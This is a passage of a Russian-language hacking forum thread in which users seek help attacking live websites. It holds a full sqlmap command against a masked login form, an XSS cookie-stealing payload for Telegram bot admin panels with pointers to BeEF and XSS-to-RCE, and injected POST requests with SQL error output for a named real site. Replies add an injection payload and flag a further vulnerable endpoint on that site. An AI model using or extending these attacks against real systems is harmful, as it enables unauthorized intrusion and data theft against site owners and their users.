Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    sqlmap.py -u "https://******/client/login" -p "email" --risk="3" --level="3" --method="POST" --data="--3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22email%22

    test
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22password%22

    [email protected]
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22action%22

    login
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22submit%22

    Sign In
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22hash%22

    3a4bf5ec9dcc971c08509bf8f5ca5cf1daac489a
    --3e306551ffbd4492975ea8cd2a9917cc--
    " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --headers="Accept:application/json, text/javascript, */*; q=0.01\nContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryOln7Ytw9vsNImdiP\nOrigin:https://*****\nX-Requested-With:XMLHttpRequest\nReferer:https://****/terms" --dbms="MySQL" --batch
    Подскажите как это всё в мапу упаковать?Сама мапа не находит уяз на сайте,пришлось спаркером воспользоваться,команда выдает то,что выше,но мапа так это не хавает
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,458
    Likes Received:
    777
    Reputations:
    834
    положи весь запрос в файлик и обратись к нему через параметр -r file.txt
     
    _________________________
    AngelEyes likes this.
  3. M.Billar

    M.Billar Member

    Joined:
    24 Jul 2013
    Messages:
    74
    Likes Received:
    53
    Reputations:
    0
    Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя.
    Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: <script>alert(document.cookie)</script>
    Зайти в бота, и в админке вуаля

    [​IMG]

    Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,458
    Likes Received:
    777
    Reputations:
    834
    Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF https://cryptoworld.su/beef-framework/, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS
     
    _________________________
    M.Billar and ms13 like this.
  5. M.Billar

    M.Billar Member

    Joined:
    24 Jul 2013
    Messages:
    74
    Likes Received:
    53
    Reputations:
    0
    [​IMG]


    Печально обстоят дела с телегой... Ну вот что им стоит поднять задницу и профиксить это на выводе к ботам напр? А так, ходи, тр***й всех вокруг - им пофиг.
     
  6. highmoore

    highmoore New Member

    Joined:
    4 Dec 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Простите за дубль, но все так же в поисках решения
     
  7. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    10
    Кидай в лс, раскрутим ее. Помогу чем смогу
     
  8. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1
    POST draw=4&columns[0][data]= ' &columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=Smith&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=3&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=Smith&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=3&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=Smith&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=3&columns[4][search][regex]=false&start=3&length=25&search[value]=3&search[regex]=false

    A Database Error Occurred
    Error Number: 1064

    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100' at line 4

    SELECT `email`, `date` FROM `login` WHERE `referral` = '[email protected]' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100

    Filename: libraries/Datatables.php

    Line Number: 354

    крутиться вообще никак не хочет может кто подскажет что
    sqlmap тоже не берёт
     
  9. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,933
    Likes Received:
    769
    Reputations:
    198
    вижу 2 колонки, а остальное не понятно. columns[0][data]= ' я так понял тут инжектите? А до ваших манипуляций там какие были данные? Если `date` это columns[0][data] тогда у вас иньекция в начале запроса:
    Code:
    SELECT `email`, `ТУТ_СКУЛЯ` FROM `login` WHERE `referral` = '[email protected]' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100
    в таком случае вам нужно чтоб не нарушать запрос вывести 2 колонки и отбросить остальное комментарием кода.
    Либо внедрить свой код так чтоб не нарушить оставшийся запрос, по типу:
    columns[0][data]=(select version())
    а еще не понятно почему ругается на LIKE и почему там нет AND если инжект в реферале.
     
    _________________________
    #2729 b3, 21 Aug 2019 at 3:02 AM
    Last edited: 21 Aug 2019 at 3:12 AM
  10. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    199
    Likes Received:
    671
    Reputations:
    333
    ахахах нубас, рассмешил :) посмотри еще раз на запрос, истина где-то рядом! ;)
     
  11. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,388
    Reputations:
    53
    Лайтик :love: там нет инъекции.
    п.с я чет не понял юмора
    ( LIKE '%3%' OR LIKE '%3%' )
     
  12. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1
    Да не хотит крутится сайт https:/_/naira2usd.com/myreferralsx POST draw=6&columns[0][data]='&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&start=3&length=100&search[value]=3&search[regex]=false
    может у кого получится
     
  13. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    236
    Likes Received:
    109
    Reputations:
    1
    Не хотит наверное потому что там ее нету скорее всего, ну я покрайнемере ничего необычного не увидел))
    В другом месте потенциальная есть
    Code:
    https://naira2usd.com/confirmx
    POST
    draw=2&columns[0][data]=&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&start=0&length=100&search[value]='&search[regex]=false
    
     
    #2733 karkajoi, 21 Aug 2019 at 3:50 PM
    Last edited: 21 Aug 2019 at 4:09 PM
  14. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    Обходить X-Requested-With можно только через .swf?
     
Loading...